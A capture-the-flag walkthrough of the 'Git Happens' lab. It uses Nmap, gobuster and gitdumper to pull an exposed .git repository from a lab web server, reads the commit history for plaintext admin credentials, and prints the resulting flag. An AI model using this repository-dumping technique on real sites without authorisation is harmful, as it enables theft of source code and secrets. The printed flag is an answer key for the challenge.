# Git Happens ## Scanning ### Nmap Let’s start by scanning the target with Nmap. We discover a web service running on standard port 80/tcp: ``` PORT STATE SERVICE VERSION 80/tcp open http nginx 1.14.0 (Ubuntu) | http-git: | 10.10.113.201:80/.git/ | Git repository found! |_ Repository description: Unnamed repository; edit this file 'description' to name the... |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Super Awesome Site! Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## Enumeration Nmap script also discovered a git repository, which we can confirGit m with gobuster: ``` kali@kali:/data/Git_Happens$ gobuster dir -u http://10.10.113.201 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.113.201 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/08/27 08:31:16 Starting gobuster =============================================================== /.git/HEAD (Status: 200) /css (Status: 301) /index.html (Status: 200) =============================================================== 2020/08/27 08:32:02 Finished =============================================================== ``` ### Dump the git repo Let’s use gitdumper from [GitTools](https://github.com/internetwache/GitTools) to download the content of the Git repo: ``` kali@kali:/data/src/GitTools/Dumper$ ./gitdumper.sh http://10.10.113.201/.git/ /data/Git_Happens/files/ ########### # GitDumper is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### ​ ​ [*] Destination folder does not exist [+] Creating /data/Git_Happens/files//.git/ [+] Downloaded: HEAD [-] Downloaded: objects/info/packs [+] Downloaded: description [+] Downloaded: config [-] Downloaded: COMMIT_EDITMSG [+] Downloaded: index [+] Downloaded: packed-refs [+] Downloaded: refs/heads/master [-] Downloaded: refs/remotes/origin/HEAD [-] Downloaded: refs/stash [+] Downloaded: logs/HEAD [+] Downloaded: logs/refs/heads/master [-] Downloaded: logs/refs/remotes/origin/HEAD [-] Downloaded: info/refs [+] Downloaded: info/exclude [-] Downloaded: /refs/wip/index/refs/heads/master [-] Downloaded: /refs/wip/wtree/refs/heads/master [+] Downloaded: objects/d0/b3578a628889f38c0affb1b75457146a4678e5 [-] Downloaded: objects/00/00000000000000000000000000000000000000 [+] Downloaded: objects/b8/6ab47bacf3550a5450b0eb324e36ce46ba73f1 [+] Downloaded: objects/77/aab78e2624ec9400f9ed3f43a6f0c942eeb82d [+] Downloaded: objects/f1/4bcee8053e39eeb414053db4ec7b985f65edc8 [+] Downloaded: objects/9d/74a92581071ae7c4a470ff035e0de4598877e5 [+] Downloaded: objects/20/9515b2f7cbdfb731d275c4b089e41ba35c3bc8 [+] Downloaded: objects/5a/35c9b7c787c22f689d0364cf57b013a11561a2 [+] Downloaded: objects/08/906612dfe6821cebc21794eb85601fc4f54de9 [+] Downloaded: objects/4a/2aab268541cbcc434e0565b4f4f2deca29ee5f [+] Downloaded: objects/7c/578d86a8713b67af2cb1b1d7c524c23cefe7aa [+] Downloaded: objects/4e/7178fa5b68fec15e54f2b79ace6f9ce0169e01 [+] Downloaded: objects/2e/b93ac3534155069a8ef59cb25b9c1971d5d199 [+] Downloaded: objects/4c/f757268c6824041664d132a29908aa9c362a26 [+] Downloaded: objects/3a/39b02d3b9d12222bac4737ee67e31403d62f13 [+] Downloaded: objects/ae/f68b1e25df81a8c96ee4d57b20cc9f7a1ebee5 [+] Downloaded: objects/d6/df4000639981d032f628af2b4d03b8eff31213 [+] Downloaded: objects/56/820adbbd5ac0f66f61916122c94ea52937e9b2 [+] Downloaded: objects/d9/54a99b96ff11c37a558a5d93ce52d0f3702a7d [+] Downloaded: objects/06/012255f074d7bc4acc6fadbcff004380b5f83b [+] Downloaded: objects/bc/8054d9d95854d278359a432b6d97c27e24061d [+] Downloaded: objects/dd/13038df878d41b774ce4fd4552091d46873c25 [+] Downloaded: objects/8c/94b154aef92380e29a3f16f1a889b56127cf13 [+] Downloaded: objects/e5/6eaa8e29b589976f33d76bc58a0c4dfb9315b1 [+] Downloaded: objects/48/926fdeb371c8ba174b1669d102e8c873afabf1 [+] Downloaded: objects/ce/b8d530ebcf79806dffc981905ec8c2e0d7a65b [+] Downloaded: objects/87/bcbcb476578c6cc90ed39f9404292539fe1c9c [+] Downloaded: objects/39/5e087334d613d5e423cdf8f7be27196a360459 [-] Downloaded: objects/40/04c23a71fd6ba9b03ec9cb7eed08471197d843 [-] Downloaded: objects/19/a865c5442a9d6a7c7cbea070f3cb6aa5106ef8 [-] Downloaded: objects/0f/679a88dbbaf89ff64cb351a151a5f29819a3c0 [+] Downloaded: objects/0e/abcfcd62467d64fb30b889e8de5886e028c3ed [+] Downloaded: objects/ba/5e4a76e3f7b6c49850c41716f8f1091fbdc84e [+] Downloaded: objects/2f/423697bf81fe5956684f66fb6fc6596a1903cc [+] Downloaded: objects/e3/8d9df9b13e6499b749e36e064ec30f2fa45657 [+] Downloaded: objects/0e/0de07611ada4690fc0ea5b5c04721ba6f3fd0d [+] Downloaded: objects/66/64f4e548df7591da3728d7662b6376debfce8d ``` ### Git logs Now, let’s check the logs. We can see several commits. ``` kali@kali:/data/Git_Happens/files$ git log commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0) Author: Adam Bertrand Date: Thu Jul 23 22:22:16 2020 +0000 ​ Update .gitlab-ci.yml ​ commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d Author: Hydragyrum Date: Fri Jul 24 00:21:25 2020 +0200 ​ add gitlab-ci config to build docker file. ​ commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199 Author: Hydragyrum Date: Fri Jul 24 00:08:38 2020 +0200 ​ setup dockerfile and setup defaults. ​ commit d6df4000639981d032f628af2b4d03b8eff31213 Author: Hydragyrum Date: Thu Jul 23 23:42:30 2020 +0200 ​ Make sure the css is standard-ish! ​ commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d Author: Hydragyrum Date: Thu Jul 23 23:41:12 2020 +0200 ​ re-obfuscating the code to be really secure! ​ commit bc8054d9d95854d278359a432b6d97c27e24061d Author: Hydragyrum Date: Thu Jul 23 23:37:32 2020 +0200 ​ Security says obfuscation isn't enough. They want me to use something called 'SHA-512' ​ commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1 Author: Hydragyrum Date: Thu Jul 23 23:25:52 2020 +0200 ​ Obfuscated the source code. Hopefully security will be happy! ​ commit 395e087334d613d5e423cdf8f7be27196a360459 Author: Hydragyrum Date: Thu Jul 23 23:17:43 2020 +0200 ​ Made the login page, boss! ​ commit 2f423697bf81fe5956684f66fb6fc6596a1903cc Author: Adam Bertrand Date: Mon Jul 20 20:46:28 2020 +0000 ​ Initial commit (END) ``` ### Show files Based on these commits, we can use `git show` to highlight files modifications from the commits (we’ll start with the reverse order for the commits). For the initial commit with ID `2f423697bf81fe5956684f66fb6fc6596a1903cc`, there is nothing interesting, but the second commit with ID `395e087334d613d5e423cdf8f7be27196a360459` reveals the source code of the page, where credentials appear in the clear: ``` kali@kali:/data/Git_Happens/files$ git show 395e087334d613d5e423cdf8f7be27196a360459 commit 395e087334d613d5e423cdf8f7be27196a360459 Author: Hydragyrum Date: Thu Jul 23 23:17:43 2020 +0200 ​ [REDACTED] ​ + + + (END) ``` ### Authenticate Now that we have the credentials (`admin:Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!`), we can use them against the authentication page ([http://10.10.113.201](http://10.10.113.201/)). It redirects to with a message: `Awesome! Use the password you input as the flag!` ### Flag Flag: `Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!`�